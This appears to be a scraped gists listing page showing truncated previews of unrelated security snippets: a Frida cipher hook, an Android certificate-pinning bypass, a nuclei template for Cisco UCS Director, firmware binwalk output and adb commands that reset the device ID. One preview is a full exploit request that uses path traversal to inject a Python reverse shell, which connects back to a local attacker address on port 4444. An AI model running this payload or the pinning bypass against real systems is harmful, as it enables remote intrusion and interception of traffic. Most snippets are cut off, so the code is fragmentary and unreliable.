This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
import frida | |
import json | |
enc_cipher_hashcodes = [] #cipher objects with Cipher.ENCRYPT_MODE will be stored here | |
dec_cipher_hashcodes = [] #cipher objects with Cipher.ENCRYPT_MODE will be stored here | |
def my_message_handler(message, payload): | |
#mainly printing the data sent from the js code, and managing the cipher objects according to their operation mode | |
if message["type"] == "send": |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -ik --path-as-is https://192.168.86.111/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection -H 'Content-Type: application/json' --data-binary $'{ \"type\": \";python -c \'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"192.168.86.43\\\",4444));subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\';\", \"txtGCPProject\":\"a\", \"txtGCPSecret\":\"a\", \"txtGCPPath\":\"a\", \"txtGCPBucket\":\"a\" }' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import string | |
import warnings | |
import json | |
import argparse | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
warnings.simplefilter('ignore',InsecureRequestWarning) | |
proxy = { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SoapClient | |
SplFileObject | |
tidy |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
setTimeout(function() { | |
Java.perform(function() { | |
console.log(''); | |
console.log('======'); | |
console.log('[#] Android Bypass for various Certificate Pinning methods [#]'); | |
console.log('======'); | |
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager'); | |
var SSLContext = Java.use('javax.net.ssl.SSLContext'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
snprintf(filename, PATH_MAX, "%s/%s", config->webroot, page); // vuln |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# Use this script to test if a given TCP host/port are available | |
WAITFORIT_cmdname=${0##*/} | |
echoerr() { if [[ $WAITFORIT_QUIET -ne 1 ]]; then echo "$@" 1>&2; fi } | |
usage() | |
{ | |
cat << USAGE >&2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: cisco-ucs | |
info: | |
name: Cisco UCS Director | |
author: numanturle | |
severity: critical | |
tags: cisco,cisco imc,cisco-imc | |
requests: | |
- method: GET |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
root@bitforbyte:~/xxx# binwalk 100AAPP7D0.bin | |
DECIMAL HEXADECIMAL DESCRIPTION | |
-------------------------------------------------------------------------------- | |
131072 0x20000 JFFS2 filesystem, big endian | |
JFFS2 filesystem extract | |
total 1492 | |
1049502 drwxr-xr-x 18 root root 4096 Oct 27 23:33 . |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
adb shell content query --uri content://settings/secure --where "name=\'android_id\'" | |
adb shell content delete --uri content://settings/secure --where "name=\'android_id\'" | |
adb shell content insert --uri content://settings/secure --bind name:s:android_id --bind value:s:7373de1e9e9670c2 |
NewerOlder